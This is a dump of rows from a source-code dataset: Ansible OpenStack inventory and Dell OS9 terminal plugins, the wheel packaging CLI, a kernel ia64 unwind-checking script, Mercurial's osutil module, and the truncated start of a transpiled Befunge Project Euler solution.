repo_name (string, 5-100 chars) | path (string, 4-375 chars) | copies (string, 991 classes) | size (string, 4-7 chars) | content (string, 666-1M chars) | license (string, 15 classes)
---|---|---|---|---|---|
tersmitten/ansible | lib/ansible/plugins/inventory/openstack.py | 14 | 13236 | # Copyright (c) 2012, Marco Vito Moscaritolo <marco@agavee.com>
# Copyright (c) 2013, Jesse Keating <jesse.keating@rackspace.com>
# Copyright (c) 2015, Hewlett-Packard Development Company, L.P.
# Copyright (c) 2016, Rackspace Australia
# Copyright (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = '''
name: openstack
plugin_type: inventory
author:
- Marco Vito Moscaritolo <marco@agavee.com>
- Jesse Keating <jesse.keating@rackspace.com>
short_description: OpenStack inventory source
requirements:
- openstacksdk
extends_documentation_fragment:
- inventory_cache
- constructed
description:
- Get inventory hosts from OpenStack clouds
- Uses openstack.(yml|yaml) YAML configuration file to configure the inventory plugin
- Uses standard clouds.yaml YAML configuration file to configure cloud credentials
options:
plugin:
description: token that ensures this is a source file for the 'openstack' plugin.
required: True
choices: ['openstack']
show_all:
description: toggles showing all vms vs only those with a working IP
type: bool
default: 'no'
inventory_hostname:
description: |
What to register as the inventory hostname.
If set to 'uuid' the uuid of the server will be used and a
group will be created for the server name.
If set to 'name' the name of the server will be used unless
there are more than one server with the same name in which
case the 'uuid' logic will be used.
Default is to do 'name', which is the opposite of the old
openstack.py inventory script's option use_hostnames.
type: string
choices:
- name
- uuid
default: "name"
expand_hostvars:
description: |
Run extra commands on each host to fill in additional
information about the host. May interrogate cinder and
neutron and can be expensive for people with many hosts.
(Note, the default value of this is opposite from the default
old openstack.py inventory script's option expand_hostvars)
type: bool
default: 'no'
private:
description: |
Use the private interface of each server, if it has one, as
the host's IP in the inventory. This can be useful if you are
running ansible inside a server in the cloud and would rather
communicate to your servers over the private network.
type: bool
default: 'no'
only_clouds:
description: |
List of clouds from clouds.yaml to use, instead of using
the whole list.
type: list
default: []
fail_on_errors:
description: |
Causes the inventory to fail and return no hosts if one cloud
has failed (for example, bad credentials or being offline).
When set to False, the inventory will return as many hosts as
it can from as many clouds as it can contact. (Note, the
default value of this is opposite from the old openstack.py
inventory script's option fail_on_errors)
type: bool
default: 'no'
clouds_yaml_path:
description: |
Override path to clouds.yaml file. If this value is given it
will be searched first. The default path for the
ansible inventory adds /etc/ansible/openstack.yaml and
/etc/ansible/openstack.yml to the regular locations documented
at https://docs.openstack.org/os-client-config/latest/user/configuration.html#config-files
type: string
env:
- name: OS_CLIENT_CONFIG_FILE
compose:
description: Create vars from jinja2 expressions.
type: dictionary
default: {}
groups:
description: Add hosts to group based on Jinja2 conditionals.
type: dictionary
default: {}
'''
EXAMPLES = '''
# file must be named openstack.yaml or openstack.yml
# Make the plugin behave like the default behavior of the old script
plugin: openstack
expand_hostvars: yes
fail_on_errors: yes
'''
import collections
import sys
from ansible.errors import AnsibleParserError
from ansible.plugins.inventory import BaseInventoryPlugin, Constructable, Cacheable
try:
# Due to name shadowing we have to import these modules indirectly
import importlib
sdk = importlib.import_module('openstack')
sdk_inventory = importlib.import_module('openstack.cloud.inventory')
client_config = importlib.import_module('openstack.config.loader')
HAS_SDK = True
except ImportError:
HAS_SDK = False
class InventoryModule(BaseInventoryPlugin, Constructable, Cacheable):
''' Host inventory provider for ansible using OpenStack clouds. '''
NAME = 'openstack'
def parse(self, inventory, loader, path, cache=True):
super(InventoryModule, self).parse(inventory, loader, path)
cache_key = self._get_cache_prefix(path)
# file is config file
self._config_data = self._read_config_data(path)
msg = ''
if not self._config_data:
msg = 'File empty. this is not my config file'
elif 'plugin' in self._config_data and self._config_data['plugin'] != self.NAME:
msg = 'plugin config file, but not for us: %s' % self._config_data['plugin']
elif 'plugin' not in self._config_data and 'clouds' not in self._config_data:
msg = "it's not a plugin configuration nor a clouds.yaml file"
elif not HAS_SDK:
msg = "openstacksdk is required for the OpenStack inventory plugin. OpenStack inventory sources will be skipped."
if msg:
raise AnsibleParserError(msg)
# The user has pointed us at a clouds.yaml file. Use defaults for
# everything.
if 'clouds' in self._config_data:
self._config_data = {}
# update cache if the user has caching enabled and the cache is being refreshed
# will update variable below in the case of an expired cache
cache_needs_update = not cache and self.get_option('cache')
if cache:
cache = self.get_option('cache')
source_data = None
if cache:
try:
source_data = self._cache[cache_key]
except KeyError:
# cache expired or doesn't exist yet
cache_needs_update = True
if not source_data:
clouds_yaml_path = self._config_data.get('clouds_yaml_path')
if clouds_yaml_path:
config_files = (clouds_yaml_path +
client_config.CONFIG_FILES)
else:
config_files = None
# Redirect logging to stderr so it does not mix with output,
# in particular the ansible-inventory JSON output
# TODO(mordred) Integrate openstack's logging with ansible's logging
sdk.enable_logging(stream=sys.stderr)
cloud_inventory = sdk_inventory.OpenStackInventory(
config_files=config_files,
private=self._config_data.get('private', False))
only_clouds = self._config_data.get('only_clouds', [])
if only_clouds and not isinstance(only_clouds, list):
raise ValueError(
'OpenStack Inventory Config Error: only_clouds must be'
' a list')
if only_clouds:
new_clouds = []
for cloud in cloud_inventory.clouds:
if cloud.name in only_clouds:
new_clouds.append(cloud)
cloud_inventory.clouds = new_clouds
expand_hostvars = self._config_data.get('expand_hostvars', False)
fail_on_errors = self._config_data.get('fail_on_errors', False)
source_data = cloud_inventory.list_hosts(
expand=expand_hostvars, fail_on_cloud_config=fail_on_errors)
if cache_needs_update:
self._cache[cache_key] = source_data
self._populate_from_source(source_data)
def _populate_from_source(self, source_data):
groups = collections.defaultdict(list)
firstpass = collections.defaultdict(list)
hostvars = {}
use_server_id = (
self._config_data.get('inventory_hostname', 'name') != 'name')
show_all = self._config_data.get('show_all', False)
for server in source_data:
if 'interface_ip' not in server and not show_all:
continue
firstpass[server['name']].append(server)
for name, servers in firstpass.items():
if len(servers) == 1 and not use_server_id:
self._append_hostvars(hostvars, groups, name, servers[0])
else:
server_ids = set()
# Trap for duplicate results
for server in servers:
server_ids.add(server['id'])
if len(server_ids) == 1 and not use_server_id:
self._append_hostvars(hostvars, groups, name, servers[0])
else:
for server in servers:
self._append_hostvars(
hostvars, groups, server['id'], server,
namegroup=True)
self._set_variables(hostvars, groups)
def _set_variables(self, hostvars, groups):
# set vars in inventory from hostvars
for host in hostvars:
# create composite vars
self._set_composite_vars(
self._config_data.get('compose'), hostvars[host], host)
# actually update inventory
for key in hostvars[host]:
self.inventory.set_variable(host, key, hostvars[host][key])
# constructed groups based on conditionals
self._add_host_to_composed_groups(
self._config_data.get('groups'), hostvars[host], host)
# constructed groups based on jinja expressions
self._add_host_to_keyed_groups(
self._config_data.get('keyed_groups'), hostvars[host], host)
for group_name, group_hosts in groups.items():
self.inventory.add_group(group_name)
for host in group_hosts:
self.inventory.add_child(group_name, host)
def _get_groups_from_server(self, server_vars, namegroup=True):
groups = []
region = server_vars['region']
cloud = server_vars['cloud']
metadata = server_vars.get('metadata', {})
# Create a group for the cloud
groups.append(cloud)
# Create a group on region
if region:
groups.append(region)
# And one by cloud_region
groups.append("%s_%s" % (cloud, region))
# Check if group metadata key in servers' metadata
if 'group' in metadata:
groups.append(metadata['group'])
for extra_group in metadata.get('groups', '').split(','):
if extra_group:
groups.append(extra_group.strip())
groups.append('instance-%s' % server_vars['id'])
if namegroup:
groups.append(server_vars['name'])
for key in ('flavor', 'image'):
if 'name' in server_vars[key]:
groups.append('%s-%s' % (key, server_vars[key]['name']))
for key, value in iter(metadata.items()):
groups.append('meta-%s_%s' % (key, value))
az = server_vars.get('az', None)
if az:
# Make groups for az, region_az and cloud_region_az
groups.append(az)
groups.append('%s_%s' % (region, az))
groups.append('%s_%s_%s' % (cloud, region, az))
return groups
def _append_hostvars(self, hostvars, groups, current_host,
server, namegroup=False):
hostvars[current_host] = dict(
ansible_ssh_host=server['interface_ip'],
ansible_host=server['interface_ip'],
openstack=server)
self.inventory.add_host(current_host)
for group in self._get_groups_from_server(server, namegroup=namegroup):
groups[group].append(current_host)
def verify_file(self, path):
if super(InventoryModule, self).verify_file(path):
for fn in ('openstack', 'clouds'):
for suffix in ('yaml', 'yml'):
maybe = '{fn}.{suffix}'.format(fn=fn, suffix=suffix)
if path.endswith(maybe):
return True
return False
| gpl-3.0 |
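For context on the plugin above: it is driven by a small YAML file whose keys mirror the options listed in DOCUMENTATION. The sketch below follows the EXAMPLES convention (YAML held in a Python string) and adds a few more of the documented options; the cloud name, file path and group key are illustrative assumptions, not values taken from the row above.
# --- illustrative sketch, not part of the dataset row above ---
EXTENDED_EXAMPLE = '''
# file must be named openstack.yaml or openstack.yml
plugin: openstack
expand_hostvars: no
fail_on_errors: no
only_clouds:
  - mordred              # assumed cloud name from clouds.yaml
clouds_yaml_path:
  - /etc/ansible/clouds.yaml
keyed_groups:
  - prefix: flavor
    key: openstack.flavor.name
'''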
erwilan/ansible | lib/ansible/plugins/terminal/dellos9.py | 71 | 2779 | #
# (c) 2016 Red Hat Inc.
#
# Copyright (c) 2017 Dell Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import re
import json
from ansible.module_utils._text import to_text, to_bytes
from ansible.plugins.terminal import TerminalBase
from ansible.errors import AnsibleConnectionFailure
class TerminalModule(TerminalBase):
terminal_stdout_re = [
re.compile(br"[\r\n]?[\w+\-\.:\/\[\]]+(?:\([^\)]+\)){,3}(?:>|#) ?$"),
re.compile(br"\[\w+\@[\w\-\.]+(?: [^\]])\] ?[>#\$] ?$")
]
terminal_stderr_re = [
re.compile(br"% ?Error: (?:(?!\bdoes not exist\b)(?!\balready exists\b)(?!\bHost not found\b)(?!\bnot active\b).)*$"),
re.compile(br"% ?Bad secret"),
re.compile(br"invalid input", re.I),
re.compile(br"(?:incomplete|ambiguous) command", re.I),
re.compile(br"connection timed out", re.I),
re.compile(br"'[^']' +returned error code: ?\d+"),
]
def on_open_shell(self):
try:
self._exec_cli_command(b'terminal length 0')
except AnsibleConnectionFailure:
raise AnsibleConnectionFailure('unable to set terminal parameters')
def on_authorize(self, passwd=None):
if self._get_prompt().endswith(b'#'):
return
cmd = {u'command': u'enable'}
if passwd:
cmd[u'prompt'] = to_text(r"[\r\n]?password: $", errors='surrogate_or_strict')
cmd[u'answer'] = passwd
try:
self._exec_cli_command(to_bytes(json.dumps(cmd), errors='surrogate_or_strict'))
except AnsibleConnectionFailure:
raise AnsibleConnectionFailure('unable to elevate privilege to enable mode')
def on_deauthorize(self):
prompt = self._get_prompt()
if prompt is None:
# if prompt is None most likely the terminal is hung up at a prompt
return
if prompt.strip().endswith(b')#'):
self._exec_cli_command(b'end')
self._exec_cli_command(b'disable')
elif prompt.endswith(b'#'):
self._exec_cli_command(b'disable')
| gpl-3.0 |
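The terminal plugin above recognises the device prompt through terminal_stdout_re. A minimal, self-contained sketch of how its first pattern behaves against hand-written sample prompts (the prompt strings are invented for illustration):
# --- illustrative sketch, not part of the dataset row above ---
import re

stdout_re = re.compile(br"[\r\n]?[\w+\-\.:\/\[\]]+(?:\([^\)]+\)){,3}(?:>|#) ?$")

for prompt in (b"Dell>", b"Dell#", b"Dell(conf)#", b"no prompt here"):
    print(prompt, "matches" if stdout_re.search(prompt) else "no match")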
znoland3/zachdemo | venvdir/lib/python3.4/site-packages/wheel/tool/__init__.py | 238 | 13310 | """
Wheel command-line utility.
"""
import os
import hashlib
import sys
import json
import wheel.paths
from glob import iglob
from .. import signatures
from ..util import (urlsafe_b64decode, urlsafe_b64encode, native, binary,
matches_requirement)
from ..install import WheelFile
def require_pkgresources(name):
try:
import pkg_resources
except ImportError:
raise RuntimeError("'{0}' needs pkg_resources (part of setuptools).".format(name))
import argparse
class WheelError(Exception): pass
# For testability
def get_keyring():
try:
from ..signatures import keys
import keyring
except ImportError:
raise WheelError("Install wheel[signatures] (requires keyring, pyxdg) for signatures.")
return keys.WheelKeys, keyring
def keygen(get_keyring=get_keyring):
"""Generate a public/private key pair."""
WheelKeys, keyring = get_keyring()
ed25519ll = signatures.get_ed25519ll()
wk = WheelKeys().load()
keypair = ed25519ll.crypto_sign_keypair()
vk = native(urlsafe_b64encode(keypair.vk))
sk = native(urlsafe_b64encode(keypair.sk))
kr = keyring.get_keyring()
kr.set_password("wheel", vk, sk)
sys.stdout.write("Created Ed25519 keypair with vk={0}\n".format(vk))
if isinstance(kr, keyring.backends.file.BaseKeyring):
sys.stdout.write("in {0}\n".format(kr.file_path))
else:
sys.stdout.write("in %r\n" % kr.__class__)
sk2 = kr.get_password('wheel', vk)
if sk2 != sk:
raise WheelError("Keyring is broken. Could not retrieve secret key.")
sys.stdout.write("Trusting {0} to sign and verify all packages.\n".format(vk))
wk.add_signer('+', vk)
wk.trust('+', vk)
wk.save()
def sign(wheelfile, replace=False, get_keyring=get_keyring):
"""Sign a wheel"""
WheelKeys, keyring = get_keyring()
ed25519ll = signatures.get_ed25519ll()
wf = WheelFile(wheelfile, append=True)
wk = WheelKeys().load()
name = wf.parsed_filename.group('name')
sign_with = wk.signers(name)[0]
sys.stdout.write("Signing {0} with {1}\n".format(name, sign_with[1]))
vk = sign_with[1]
kr = keyring.get_keyring()
sk = kr.get_password('wheel', vk)
keypair = ed25519ll.Keypair(urlsafe_b64decode(binary(vk)),
urlsafe_b64decode(binary(sk)))
record_name = wf.distinfo_name + '/RECORD'
sig_name = wf.distinfo_name + '/RECORD.jws'
if sig_name in wf.zipfile.namelist():
raise WheelError("Wheel is already signed.")
record_data = wf.zipfile.read(record_name)
payload = {"hash":"sha256=" + native(urlsafe_b64encode(hashlib.sha256(record_data).digest()))}
sig = signatures.sign(payload, keypair)
wf.zipfile.writestr(sig_name, json.dumps(sig, sort_keys=True))
wf.zipfile.close()
def unsign(wheelfile):
"""
Remove RECORD.jws from a wheel by truncating the zip file.
RECORD.jws must be at the end of the archive. The zip file must be an
ordinary archive, with the compressed files and the directory in the same
order, and without any non-zip content after the truncation point.
"""
import wheel.install
vzf = wheel.install.VerifyingZipFile(wheelfile, "a")
info = vzf.infolist()
if not (len(info) and info[-1].filename.endswith('/RECORD.jws')):
raise WheelError("RECORD.jws not found at end of archive.")
vzf.pop()
vzf.close()
def verify(wheelfile):
"""Verify a wheel.
The signature will be verified for internal consistency ONLY and printed.
Wheel's own unpack/install commands verify the manifest against the
signature and file contents.
"""
wf = WheelFile(wheelfile)
sig_name = wf.distinfo_name + '/RECORD.jws'
sig = json.loads(native(wf.zipfile.open(sig_name).read()))
verified = signatures.verify(sig)
sys.stderr.write("Signatures are internally consistent.\n")
sys.stdout.write(json.dumps(verified, indent=2))
sys.stdout.write('\n')
def unpack(wheelfile, dest='.'):
"""Unpack a wheel.
Wheel content will be unpacked to {dest}/{name}-{ver}, where {name}
is the package name and {ver} its version.
:param wheelfile: The path to the wheel.
:param dest: Destination directory (default to current directory).
"""
wf = WheelFile(wheelfile)
namever = wf.parsed_filename.group('namever')
destination = os.path.join(dest, namever)
sys.stderr.write("Unpacking to: %s\n" % (destination))
wf.zipfile.extractall(destination)
wf.zipfile.close()
def install(requirements, requirements_file=None,
wheel_dirs=None, force=False, list_files=False,
dry_run=False):
"""Install wheels.
:param requirements: A list of requirements or wheel files to install.
:param requirements_file: A file containing requirements to install.
:param wheel_dirs: A list of directories to search for wheels.
:param force: Install a wheel file even if it is not compatible.
:param list_files: Only list the files to install, don't install them.
:param dry_run: Do everything but the actual install.
"""
# If no wheel directories specified, use the WHEELPATH environment
# variable, or the current directory if that is not set.
if not wheel_dirs:
wheelpath = os.getenv("WHEELPATH")
if wheelpath:
wheel_dirs = wheelpath.split(os.pathsep)
else:
wheel_dirs = [ os.path.curdir ]
# Get a list of all valid wheels in wheel_dirs
all_wheels = []
for d in wheel_dirs:
for w in os.listdir(d):
if w.endswith('.whl'):
wf = WheelFile(os.path.join(d, w))
if wf.compatible:
all_wheels.append(wf)
# If there is a requirements file, add it to the list of requirements
if requirements_file:
# If the file doesn't exist, search for it in wheel_dirs
# This allows standard requirements files to be stored with the
# wheels.
if not os.path.exists(requirements_file):
for d in wheel_dirs:
name = os.path.join(d, requirements_file)
if os.path.exists(name):
requirements_file = name
break
with open(requirements_file) as fd:
requirements.extend(fd)
to_install = []
for req in requirements:
if req.endswith('.whl'):
# Explicitly specified wheel filename
if os.path.exists(req):
wf = WheelFile(req)
if wf.compatible or force:
to_install.append(wf)
else:
msg = ("{0} is not compatible with this Python. "
"--force to install anyway.".format(req))
raise WheelError(msg)
else:
# We could search on wheel_dirs, but it's probably OK to
# assume the user has made an error.
raise WheelError("No such wheel file: {}".format(req))
continue
# We have a requirement spec
# If we don't have pkg_resources, this will raise an exception
matches = matches_requirement(req, all_wheels)
if not matches:
raise WheelError("No match for requirement {}".format(req))
to_install.append(max(matches))
# We now have a list of wheels to install
if list_files:
sys.stdout.write("Installing:\n")
if dry_run:
return
for wf in to_install:
if list_files:
sys.stdout.write(" {0}\n".format(wf.filename))
continue
wf.install(force=force)
wf.zipfile.close()
def install_scripts(distributions):
"""
Regenerate the entry_points console_scripts for the named distribution.
"""
try:
from setuptools.command import easy_install
import pkg_resources
except ImportError:
raise RuntimeError("'wheel install_scripts' needs setuptools.")
for dist in distributions:
pkg_resources_dist = pkg_resources.get_distribution(dist)
install = wheel.paths.get_install_command(dist)
command = easy_install.easy_install(install.distribution)
command.args = ['wheel'] # dummy argument
command.finalize_options()
command.install_egg_scripts(pkg_resources_dist)
def convert(installers, dest_dir, verbose):
require_pkgresources('wheel convert')
# Only support wheel convert if pkg_resources is present
from ..wininst2wheel import bdist_wininst2wheel
from ..egg2wheel import egg2wheel
for pat in installers:
for installer in iglob(pat):
if os.path.splitext(installer)[1] == '.egg':
conv = egg2wheel
else:
conv = bdist_wininst2wheel
if verbose:
sys.stdout.write("{0}... ".format(installer))
sys.stdout.flush()
conv(installer, dest_dir)
if verbose:
sys.stdout.write("OK\n")
def parser():
p = argparse.ArgumentParser()
s = p.add_subparsers(help="commands")
def keygen_f(args):
keygen()
keygen_parser = s.add_parser('keygen', help='Generate signing key')
keygen_parser.set_defaults(func=keygen_f)
def sign_f(args):
sign(args.wheelfile)
sign_parser = s.add_parser('sign', help='Sign wheel')
sign_parser.add_argument('wheelfile', help='Wheel file')
sign_parser.set_defaults(func=sign_f)
def unsign_f(args):
unsign(args.wheelfile)
unsign_parser = s.add_parser('unsign', help=unsign.__doc__)
unsign_parser.add_argument('wheelfile', help='Wheel file')
unsign_parser.set_defaults(func=unsign_f)
def verify_f(args):
verify(args.wheelfile)
verify_parser = s.add_parser('verify', help=verify.__doc__)
verify_parser.add_argument('wheelfile', help='Wheel file')
verify_parser.set_defaults(func=verify_f)
def unpack_f(args):
unpack(args.wheelfile, args.dest)
unpack_parser = s.add_parser('unpack', help='Unpack wheel')
unpack_parser.add_argument('--dest', '-d', help='Destination directory',
default='.')
unpack_parser.add_argument('wheelfile', help='Wheel file')
unpack_parser.set_defaults(func=unpack_f)
def install_f(args):
install(args.requirements, args.requirements_file,
args.wheel_dirs, args.force, args.list_files)
install_parser = s.add_parser('install', help='Install wheels')
install_parser.add_argument('requirements', nargs='*',
help='Requirements to install.')
install_parser.add_argument('--force', default=False,
action='store_true',
help='Install incompatible wheel files.')
install_parser.add_argument('--wheel-dir', '-d', action='append',
dest='wheel_dirs',
help='Directories containing wheels.')
install_parser.add_argument('--requirements-file', '-r',
help="A file containing requirements to "
"install.")
install_parser.add_argument('--list', '-l', default=False,
dest='list_files',
action='store_true',
help="List wheels which would be installed, "
"but don't actually install anything.")
install_parser.set_defaults(func=install_f)
def install_scripts_f(args):
install_scripts(args.distributions)
install_scripts_parser = s.add_parser('install-scripts', help='Install console_scripts')
install_scripts_parser.add_argument('distributions', nargs='*',
help='Regenerate console_scripts for these distributions')
install_scripts_parser.set_defaults(func=install_scripts_f)
def convert_f(args):
convert(args.installers, args.dest_dir, args.verbose)
convert_parser = s.add_parser('convert', help='Convert egg or wininst to wheel')
convert_parser.add_argument('installers', nargs='*', help='Installers to convert')
convert_parser.add_argument('--dest-dir', '-d', default=os.path.curdir,
help="Directory to store wheels (default %(default)s)")
convert_parser.add_argument('--verbose', '-v', action='store_true')
convert_parser.set_defaults(func=convert_f)
def version_f(args):
from .. import __version__
sys.stdout.write("wheel %s\n" % __version__)
version_parser = s.add_parser('version', help='Print version and exit')
version_parser.set_defaults(func=version_f)
def help_f(args):
p.print_help()
help_parser = s.add_parser('help', help='Show this help')
help_parser.set_defaults(func=help_f)
return p
def main():
p = parser()
args = p.parse_args()
if not hasattr(args, 'func'):
p.print_help()
else:
# XXX on Python 3.3 we get 'args has no func' rather than short help.
try:
args.func(args)
return 0
except WheelError as e:
sys.stderr.write(e.message + "\n")
return 1
| mit |
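The module above wires each subcommand to a function through parser(); besides the `wheel` console script, the same entry points can be driven programmatically. A sketch assuming this legacy wheel.tool package is importable and that 'example-1.0-py2.py3-none-any.whl' (a hypothetical file name) exists in the working directory:
# --- illustrative sketch, not part of the dataset row above ---
from wheel.tool import parser   # the module shown above

p = parser()
args = p.parse_args(['unpack', '--dest', 'unpacked', 'example-1.0-py2.py3-none-any.whl'])
args.func(args)   # dispatches to unpack_f(), which calls unpack(wheelfile, dest)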
SharkBa1t/cse524 | arch/ia64/scripts/unwcheck.py | 13143 | 1714 | #!/usr/bin/python
#
# Usage: unwcheck.py FILE
#
# This script checks the unwind info of each function in file FILE
# and verifies that the sum of the region-lengths matches the total
# length of the function.
#
# Based on a shell/awk script originally written by Harish Patil,
# which was converted to Perl by Matthew Chapman, which was converted
# to Python by David Mosberger.
#
import os
import re
import sys
if len(sys.argv) != 2:
print "Usage: %s FILE" % sys.argv[0]
sys.exit(2)
readelf = os.getenv("READELF", "readelf")
start_pattern = re.compile("<([^>]*)>: \[0x([0-9a-f]+)-0x([0-9a-f]+)\]")
rlen_pattern = re.compile(".*rlen=([0-9]+)")
def check_func (func, slots, rlen_sum):
if slots != rlen_sum:
global num_errors
num_errors += 1
if not func: func = "[%#x-%#x]" % (start, end)
print "ERROR: %s: %lu slots, total region length = %lu" % (func, slots, rlen_sum)
return
num_funcs = 0
num_errors = 0
func = False
slots = 0
rlen_sum = 0
for line in os.popen("%s -u %s" % (readelf, sys.argv[1])):
m = start_pattern.match(line)
if m:
check_func(func, slots, rlen_sum)
func = m.group(1)
start = long(m.group(2), 16)
end = long(m.group(3), 16)
slots = 3 * (end - start) / 16
rlen_sum = 0L
num_funcs += 1
else:
m = rlen_pattern.match(line)
if m:
rlen_sum += long(m.group(1))
check_func(func, slots, rlen_sum)
if num_errors == 0:
print "No errors detected in %u functions." % num_funcs
else:
if num_errors > 1:
err="errors"
else:
err="error"
print "%u %s detected in %u functions." % (num_errors, err, num_funcs)
sys.exit(1)
| gpl-2.0 |
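The script above sums per-region rlen values from `readelf -u` output and compares them to the slot count derived from each function's address range. A small Python 3 sketch of that arithmetic on one invented output line:
# --- illustrative sketch, not part of the dataset row above ---
import re

start_pattern = re.compile(r"<([^>]*)>: \[0x([0-9a-f]+)-0x([0-9a-f]+)\]")
line = "<my_func>: [0x4000-0x4080]"   # invented sample of a readelf -u header line
m = start_pattern.match(line)
if m:
    func = m.group(1)
    start, end = int(m.group(2), 16), int(m.group(3), 16)
    slots = 3 * (end - start) // 16   # same formula the script feeds to check_func()
    print(func, slots)                # -> my_func 24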
suncycheng/intellij-community | plugins/hg4idea/testData/bin/mercurial/osutil.py | 90 | 5363 | # osutil.py - pure Python version of osutil.c
#
# Copyright 2009 Matt Mackall <mpm@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
import os
import stat as statmod
def _mode_to_kind(mode):
if statmod.S_ISREG(mode):
return statmod.S_IFREG
if statmod.S_ISDIR(mode):
return statmod.S_IFDIR
if statmod.S_ISLNK(mode):
return statmod.S_IFLNK
if statmod.S_ISBLK(mode):
return statmod.S_IFBLK
if statmod.S_ISCHR(mode):
return statmod.S_IFCHR
if statmod.S_ISFIFO(mode):
return statmod.S_IFIFO
if statmod.S_ISSOCK(mode):
return statmod.S_IFSOCK
return mode
def listdir(path, stat=False, skip=None):
'''listdir(path, stat=False) -> list_of_tuples
Return a sorted list containing information about the entries
in the directory.
If stat is True, each element is a 3-tuple:
(name, type, stat object)
Otherwise, each element is a 2-tuple:
(name, type)
'''
result = []
prefix = path
if not prefix.endswith(os.sep):
prefix += os.sep
names = os.listdir(path)
names.sort()
for fn in names:
st = os.lstat(prefix + fn)
if fn == skip and statmod.S_ISDIR(st.st_mode):
return []
if stat:
result.append((fn, _mode_to_kind(st.st_mode), st))
else:
result.append((fn, _mode_to_kind(st.st_mode)))
return result
if os.name != 'nt':
posixfile = open
else:
import ctypes, msvcrt
_kernel32 = ctypes.windll.kernel32
_DWORD = ctypes.c_ulong
_LPCSTR = _LPSTR = ctypes.c_char_p
_HANDLE = ctypes.c_void_p
_INVALID_HANDLE_VALUE = _HANDLE(-1).value
# CreateFile
_FILE_SHARE_READ = 0x00000001
_FILE_SHARE_WRITE = 0x00000002
_FILE_SHARE_DELETE = 0x00000004
_CREATE_ALWAYS = 2
_OPEN_EXISTING = 3
_OPEN_ALWAYS = 4
_GENERIC_READ = 0x80000000
_GENERIC_WRITE = 0x40000000
_FILE_ATTRIBUTE_NORMAL = 0x80
# open_osfhandle flags
_O_RDONLY = 0x0000
_O_RDWR = 0x0002
_O_APPEND = 0x0008
_O_TEXT = 0x4000
_O_BINARY = 0x8000
# types of parameters of C functions used (required by pypy)
_kernel32.CreateFileA.argtypes = [_LPCSTR, _DWORD, _DWORD, ctypes.c_void_p,
_DWORD, _DWORD, _HANDLE]
_kernel32.CreateFileA.restype = _HANDLE
def _raiseioerror(name):
err = ctypes.WinError()
raise IOError(err.errno, '%s: %s' % (name, err.strerror))
class posixfile(object):
'''a file object aiming for POSIX-like semantics
CPython's open() returns a file that was opened *without* setting the
_FILE_SHARE_DELETE flag, which causes rename and unlink to abort.
This even happens if any hardlinked copy of the file is in open state.
We set _FILE_SHARE_DELETE here, so files opened with posixfile can be
renamed and deleted while they are held open.
Note that if a file opened with posixfile is unlinked, the file
remains but cannot be opened again or be recreated under the same name,
until all reading processes have closed the file.'''
def __init__(self, name, mode='r', bufsize=-1):
if 'b' in mode:
flags = _O_BINARY
else:
flags = _O_TEXT
m0 = mode[0]
if m0 == 'r' and '+' not in mode:
flags |= _O_RDONLY
access = _GENERIC_READ
else:
# work around http://support.microsoft.com/kb/899149 and
# set _O_RDWR for 'w' and 'a', even if mode has no '+'
flags |= _O_RDWR
access = _GENERIC_READ | _GENERIC_WRITE
if m0 == 'r':
creation = _OPEN_EXISTING
elif m0 == 'w':
creation = _CREATE_ALWAYS
elif m0 == 'a':
creation = _OPEN_ALWAYS
flags |= _O_APPEND
else:
raise ValueError("invalid mode: %s" % mode)
fh = _kernel32.CreateFileA(name, access,
_FILE_SHARE_READ | _FILE_SHARE_WRITE | _FILE_SHARE_DELETE,
None, creation, _FILE_ATTRIBUTE_NORMAL, None)
if fh == _INVALID_HANDLE_VALUE:
_raiseioerror(name)
fd = msvcrt.open_osfhandle(fh, flags)
if fd == -1:
_kernel32.CloseHandle(fh)
_raiseioerror(name)
f = os.fdopen(fd, mode, bufsize)
# unfortunately, f.name is '<fdopen>' at this point -- so we store
# the name on this wrapper. We cannot just assign to f.name,
# because that attribute is read-only.
object.__setattr__(self, 'name', name)
object.__setattr__(self, '_file', f)
def __iter__(self):
return self._file
def __getattr__(self, name):
return getattr(self._file, name)
def __setattr__(self, name, value):
'''mimics the read-only attributes of Python file objects
by raising 'TypeError: readonly attribute' if someone tries:
f = posixfile('foo.txt')
f.name = 'bla' '''
return self._file.__setattr__(name, value)
| apache-2.0 |
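The module above is Mercurial's pure-Python fallback for its C osutil extension: listdir() returns (name, kind) or (name, kind, stat) tuples keyed to the stat-module constants, and posixfile gives POSIX-like rename/delete semantics on Windows. A sketch of typical use, assuming the module is importable as `osutil`; output depends on whatever happens to be in the current directory, and 'notes.txt' is a placeholder name:
# --- illustrative sketch, not part of the dataset row above ---
import stat as statmod
import osutil   # assumed import name for the module shown above

for name, kind in osutil.listdir('.'):
    label = 'dir' if kind == statmod.S_IFDIR else 'file'
    print(label, name)

f = osutil.posixfile('notes.txt', 'w')   # plain open() on POSIX, wrapper class on Windows
f.write('hello\n')
f.close()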
Mikescher/Project-Euler_Befunge | compiled/Python2/Euler_Problem-065.py | 1 | 3340 | #!/usr/bin/env python2
# transpiled with BefunCompile v1.3.0 (c) 2017
import sys
import zlib, base64
_g = ("AR+LCAAAAAAABADNUjFuwzAM/ApLKUsIJRTtDBEMolNXfyBwhg5aNXny40s3TlI0bge1BXqDcKQE8njiCN57MLjfAfwV/rG+8SETYldZS/EFNR0JGU9cFiIlTbXa8BUL"
+ "t1wE+2gMe0ZL+1p9H5T6eO/yvOtGlmBiC2duUhY75zBzKhZ3XzuiKYZmk56mC6dmL1tzlDRvqeVM6XCgjVWihrMUC/btbExYd0RvTqkEN5zjwhnKenvs0brZXvjV6wnU"
+ "gSNwEVwCF4yIg+HbPdL3B+vzfu6ip3E+LuNXQHlZGMnmUbDp1WpFoJ988HAlIZ5tlOplNrwBk9ih3GAEAAA=")
g = base64.b64decode(_g)[1:]
for i in range(ord(base64.b64decode(_g)[0])):
